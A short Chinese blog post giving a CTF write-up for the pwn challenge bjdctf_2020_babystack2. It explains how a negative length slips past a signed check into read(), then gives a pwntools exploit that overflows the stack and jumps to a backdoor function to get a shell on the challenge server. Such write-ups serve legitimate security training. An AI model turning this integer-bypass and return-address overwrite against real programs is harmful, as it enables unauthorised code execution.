pwn | bjdctf_2020_babystack2

pwn | bjdctf_2020_babystack2

ret2text
一个整数判断,比较的时候是int,传进read当参数的时候是unsigned int,输入负数就能绕过。

image

然后跳转到后门函数就行了。
怪没意思的,直接远程秒了。

exp:

from pwn import *

context.log_level = 'debug'


p = remote('node4.buuoj.cn',28943)

p_backdoor = 0x0000000000400726
p_backdoor = 0x000000000040072A
p_main = 0x000000000040073B

p.recv()

p.sendline(b'-100')

p.recv()

p.sendline(b'A'*(0x10+8) + p64(p_backdoor))

p.interactive()

posted @ 2022-11-26 15:37  Mz1  阅读(29)  评论(0编辑  收藏  举报